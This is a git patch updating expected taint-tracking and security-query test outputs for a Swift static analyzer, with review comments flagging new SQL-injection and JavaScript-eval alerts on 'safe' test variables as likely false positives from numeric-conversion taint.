| result | +| conversions.swift:86:12:86:46 | call to Self.init(clamping:) | conversions.swift:86:26:86:45 | call to sourceInt(_:) | conversions.swift:86:12:86:46 | call to Self.init(clamping:) | result | +| conversions.swift:87:12:87:49 | call to Self.init(clamping:) | conversions.swift:87:29:87:48 | call to sourceInt(_:) | conversions.swift:87:12:87:49 | call to Self.init(clamping:) | result | +| conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | conversions.swift:88:36:88:55 | call to sourceInt(_:) | conversions.swift:88:12:88:56 | call to Self.init(truncatingIfNeeded:) | result | +| conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | conversions.swift:89:39:89:58 | call to sourceInt(_:) | conversions.swift:89:12:89:59 | call to Self.init(truncatingIfNeeded:) | result | | conversions.swift:90:12:90:51 | ...! | conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:51 | ...! | result | | conversions.swift:91:12:91:54 | ...! | conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:54 | ...! | result | | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | result | 
@@ -560,6 +677,7 @@ subpaths | conversions.swift:100:12:100:36 | .bigEndian | conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | result | | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | conversions.swift:136:12:136:33 | call to sourceFloat(_:) | result | | conversions.swift:137:12:137:40 | call to Float.init(_:) | conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | result | +| conversions.swift:138:12:138:40 | call to UInt8.init(_:) | conversions.swift:138:18:138:39 | call to sourceFloat(_:) | conversions.swift:138:12:138:40 | call to UInt8.init(_:) | result | | conversions.swift:139:12:139:41 | call to String.init(_:) | conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | result | | conversions.swift:140:12:140:43 | .utf8 | conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:43 | .utf8 | result | | conversions.swift:141:12:141:43 | call to String.init(_:) | conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | result | 
@@ -576,6 +694,10 @@ subpaths | conversions.swift:155:12:155:37 | .significand | conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | result | | conversions.swift:156:12:156:36 | .exponent | conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | result | | conversions.swift:157:12:157:36 | .significand | conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | result | +| conversions.swift:158:12:158:34 | .byteSwapped | conversions.swift:158:12:158:32 | call to sourceUInt(_:) | conversions.swift:158:12:158:34 | .byteSwapped | result | +| conversions.swift:159:12:159:36 | .byteSwapped | conversions.swift:159:12:159:34 | call to sourceUInt64(_:) | conversions.swift:159:12:159:36 | .byteSwapped | result | +| conversions.swift:160:12:160:33 | .magnitude | conversions.swift:160:12:160:31 | call to sourceInt(_:) | conversions.swift:160:12:160:33 | .magnitude | result | +| conversions.swift:161:12:161:37 | .magnitude | conversions.swift:161:12:161:35 | call to sourceUInt64(_:) | conversions.swift:161:12:161:37 | .magnitude | result | | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | conversions.swift:165:12:165:35 | call to sourceString(_:) | result | | conversions.swift:166:12:166:43 | call to String.init(_:) | conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | result | | conversions.swift:175:12:175:12 | ms2 | conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:175:12:175:12 | ms2 | result | 
@@ -585,6 +707,7 @@ subpaths | conversions.swift:184:12:184:12 | parent | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:184:12:184:12 | parent | result | | conversions.swift:187:12:187:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:187:12:187:12 | v3 | result | | conversions.swift:188:12:188:12 | v3 | conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:188:12:188:12 | v3 | result | +| conversions.swift:196:12:196:42 | call to Self.init(_:) | conversions.swift:196:24:196:41 | call to sourceInt(_:) | conversions.swift:196:12:196:42 | call to Self.init(_:) | result | | conversions.swift:203:13:203:13 | arr1 | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | result | | conversions.swift:204:13:204:13 | arr2 | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:204:13:204:13 | arr2 | result | | conversions.swift:205:13:205:19 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | result | 
@@ -598,10 +721,12 @@ subpaths | conversions.swift:219:13:219:20 | ...[...] | conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:219:13:219:20 | ...[...] | result | | conversions.swift:220:13:220:20 | ...[...] | conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:220:13:220:20 | ...[...] | result | | conversions.swift:236:13:236:13 | withUInt | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:236:13:236:13 | withUInt | result | +| conversions.swift:238:12:238:12 | self | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:238:12:238:12 | self | result | | conversions.swift:242:13:242:25 | .v | conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:242:13:242:25 | .v | result | | conversions.swift:248:13:248:26 | .v | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:248:13:248:26 | .v | result | | conversions.swift:251:12:251:12 | self | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:251:12:251:12 | self | result | | conversions.swift:255:13:255:25 | .v | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:255:13:255:25 | .v | result | +| conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:262:12:262:44 | call to Int.init(withUInt:) | result | | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | result | | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | result | | simple.swift:12:13:12:24 | ... .+(_:_:) ... | simple.swift:12:17:12:24 | call to source() | simple.swift:12:13:12:24 | ... .+(_:_:) ... 
| result | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected index 0be7309f857..8ec8033d086 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/TaintInline.expected 
@@ -1,30 +1,2 @@ testFailures -| conversions.swift:33:39:34:1 | // $ tainted=conv1-2\n | Missing result: tainted=conv1-2 | -| conversions.swift:34:40:35:1 | // $ tainted=conv1-3\n | Missing result: tainted=conv1-3 | -| conversions.swift:35:41:36:1 | // $ tainted=conv1-4\n | Missing result: tainted=conv1-4 | -| conversions.swift:36:41:37:1 | // $ tainted=conv1-5\n | Missing result: tainted=conv1-5 | -| conversions.swift:37:41:38:1 | // $ tainted=conv1-6\n | Missing result: tainted=conv1-6 | -| conversions.swift:39:40:40:1 | // $ tainted=conv1-8\n | Missing result: tainted=conv1-8 | -| conversions.swift:40:41:41:1 | // $ tainted=conv1-9\n | Missing result: tainted=conv1-9 | -| conversions.swift:41:43:42:1 | // $ tainted=conv1-10\n | Missing result: tainted=conv1-10 | -| conversions.swift:42:43:43:1 | // $ tainted=conv1-11\n | Missing result: tainted=conv1-11 | -| conversions.swift:43:43:44:1 | // $ tainted=conv1-12\n | Missing result: tainted=conv1-12 | -| conversions.swift:69:16:70:1 | // $ tainted=conv3-4\n | Missing result: tainted=conv3-4 | -| conversions.swift:72:16:73:1 | // $ tainted=conv3-5\n | Missing result: tainted=conv3-5 | -| conversions.swift:80:51:81:1 | // $ tainted=conv3-7\n | Missing result: tainted=conv3-7 | -| conversions.swift:82:54:83:1 | // $ tainted=conv3-8\n | Missing result: tainted=conv3-8 | -| conversions.swift:84:49:85:1 | // $ tainted=conv4-1\n | Missing result: tainted=conv4-1 | -| conversions.swift:85:52:86:1 | // $ tainted=conv4-2\n | Missing result: tainted=conv4-2 | -| conversions.swift:86:49:87:1 | // $ tainted=conv4-3\n | Missing result: tainted=conv4-3 | -| conversions.swift:87:52:88:1 | // $ tainted=conv4-4\n | Missing result: tainted=conv4-4 | -| conversions.swift:88:59:89:1 | // $ tainted=conv4-5\n | Missing result: tainted=conv4-5 | -| conversions.swift:89:62:90:1 | // $ tainted=conv4-6\n | Missing result: tainted=conv4-6 | -| conversions.swift:138:43:139:1 | // $ tainted=conv7-3\n | Missing result: tainted=conv7-3 | -| 
conversions.swift:158:47:159:1 | // $ tainted=conv9-7\n | Missing result: tainted=conv9-7 | -| conversions.swift:159:49:160:1 | // $ tainted=conv9-8\n | Missing result: tainted=conv9-8 | -| conversions.swift:160:44:161:1 | // $ tainted=conv9-9\n | Missing result: tainted=conv9-9 | -| conversions.swift:161:48:162:1 | // $ tainted=conv9-10\n | Missing result: tainted=conv9-10 | -| conversions.swift:196:45:197:1 | // $ tainted=cenum\n | Missing result: tainted=cenum | -| conversions.swift:238:18:239:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | -| conversions.swift:262:47:263:1 | // $ tainted=ext1\n | Missing result: tainted=ext1 | failures From 6aa43e001dd8b4cfd0b0794836b43d15c3ce6609 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:24:42 +0000 Subject: [PATCH 0701/1267] Swift: Effect on other tests. --- .../taint/libraries/TaintInline.expected | 1 - .../Security/CWE-089/SqlInjection.expected | 14 ++++ .../Security/CWE-094/UnsafeJsEval.expected | 23 +++++++ .../CWE-134/UncontrolledFormatString.expected | 21 ++++++ .../CWE-259/ConstantPassword.expected | 25 +++++++ .../Security/CWE-611/XXETest.expected | 16 ----- .../Security/CWE-760/ConstantSalt.expected | 67 +++++++++++++++++++ 7 files changed, 150 insertions(+), 17 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index bbe166c67ca..5fcb458d4fc 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected 
@@ -2,5 +2,4 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | -| string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | failures diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 36ebcd04a6e..9824b5c8e17 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -82,6 +82,7 @@ edges | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | provenance | | +| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:63:25:63:25 | remoteString | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | provenance | | 
@@ -97,6 +98,8 @@ edges | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | provenance | | +| SQLite.swift:63:21:63:37 | call to Self.init(_:) | SQLite.swift:77:17:77:17 | safeQuery2 | provenance | | +| SQLite.swift:63:25:63:25 | remoteString | SQLite.swift:63:21:63:37 | call to Self.init(_:) | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | provenance | | @@ -104,6 +107,7 @@ edges | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | provenance | | | other.swift:54:31:54:31 | remoteString | other.swift:54:14:54:43 | call to NSString.init(string:) | provenance | | +| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:123:25:123:25 | remoteString | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | provenance | | 
@@ -111,6 +115,8 @@ edges | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | provenance | | +| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | provenance | | +| sqlite3_c_api.swift:123:25:123:25 | remoteString | sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | provenance | | | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | provenance | | | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | sqlite3_c_api.swift:190:2:190:2 | data | provenance | | | sqlite3_c_api.swift:190:2:190:2 | data | sqlite3_c_api.swift:190:21:190:21 | [post] buffer | provenance | | 
@@ -214,9 +220,12 @@ nodes | GRDB.swift:350:69:350:69 | remoteString | semmle.label | remoteString | | GRDB.swift:351:84:351:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | +| SQLite.swift:63:21:63:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| SQLite.swift:63:25:63:25 | remoteString | semmle.label | remoteString | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | | SQLite.swift:75:17:75:17 | unsafeQuery3 | semmle.label | unsafeQuery3 | +| SQLite.swift:77:17:77:17 | safeQuery2 | semmle.label | safeQuery2 | | SQLite.swift:83:29:83:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | SQLite.swift:95:32:95:32 | remoteString | semmle.label | remoteString | | SQLite.swift:100:29:100:29 | unsafeQuery1 | semmle.label | unsafeQuery1 | 
@@ -238,9 +247,12 @@ nodes | other.swift:55:14:55:14 | remoteString | semmle.label | remoteString | | other.swift:57:16:57:16 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | +| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| sqlite3_c_api.swift:123:25:123:25 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | semmle.label | unsafeQuery1 | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | semmle.label | unsafeQuery2 | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | semmle.label | unsafeQuery3 | +| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | semmle.label | safeQuery2 | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | 
@@ -339,6 +351,7 @@ subpaths | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | +| SQLite.swift:77:17:77:17 | safeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:77:17:77:17 | safeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | 
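Review bot: The added `#select` row reports `SQLite.swift:77:17:77:17 | safeQuery2` as depending on the user-provided `String.init(contentsOf:)` value, although the test's own variable name marks that query as the safe case. The new edges route the taint through `SQLite.swift:63:21:63:37 | call to Self.init(_:)`, which looks like the numeric conversion this series starts tracking, so this baseline probably accepts a new CWE-089 false positive rather than a new true positive; the Swift test source is not shown here, so that needs confirming. The same applies to `sqlite3_c_api.swift:137:33:137:33 | safeQuery2` in the `@@ -360,6 +373,7 @@` hunk, and the `UnsafeJsEval.expected` edges hunk `@@ -30,6 +30,17 @@` gains a similar path through `call to Self.init(_:)` at line 217. If the value can only be a number at that point, I would add a barrier for numeric-typed values to the affected injection queries, or mark these rows as known false positives in the test source, before updating the expectations.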
@@ -360,6 +373,7 @@ subpaths | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | +| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected index cfd68d818ef..64a65dd1a54 100644 --- a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected +++ b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected 
@@ -30,6 +30,17 @@ edges | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | | UnsafeJsEval.swift:214:24:214:24 | remoteData | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:265:13:265:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:268:13:268:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:276:13:276:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:279:13:279:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | +| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | provenance | | +| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | provenance | | +| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | provenance | | +| UnsafeJsEval.swift:217:35:217:63 | try! ... | UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | provenance | | +| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:217:35:217:63 | try! ... 
| provenance | | | UnsafeJsEval.swift:265:13:265:13 | string | UnsafeJsEval.swift:266:43:266:43 | string | provenance | | | UnsafeJsEval.swift:266:43:266:43 | string | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | provenance | | | UnsafeJsEval.swift:268:13:268:13 | string | UnsafeJsEval.swift:269:43:269:43 | string | provenance | | @@ -63,6 +74,12 @@ nodes | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | semmle.label | call to String.init(decoding:as:) | | UnsafeJsEval.swift:214:24:214:24 | remoteData | semmle.label | remoteData | +| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | semmle.label | ... .+(_:_:) ... | +| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | semmle.label | ... ??(_:_:) ... | +| UnsafeJsEval.swift:217:35:217:63 | try! ... | semmle.label | try! ... | +| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:265:13:265:13 | string | semmle.label | string | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | semmle.label | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | | UnsafeJsEval.swift:266:43:266:43 | string | semmle.label | string | 
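Review bot: The new edges from UnsafeJsEval.swift:217:40 pass through `call to Self.init(_:)`, a `??` default and `String.init(_:)` before reaching the JavaScript evaluation sinks at lines 266 to 305, which reads like a remote string being parsed into a value type and turned back into text, with taint kept across the conversion. The same shape appears in the UncontrolledFormatString.expected hunks, where `taintedSan` (line 122) and `taintedSan2` (line 126) become alerts after `Self.init(_:)` and `String.init(_:)`. The Swift sources are not visible here, so the conversion type is an assumption. If it is numeric, either mark those test lines as known false positives (`// GOOD [FALSE POSITIVE]`) or track a barrier for numeric conversions, rather than accepting the rows without comment.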
@@ -97,24 +114,30 @@ subpaths | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. 
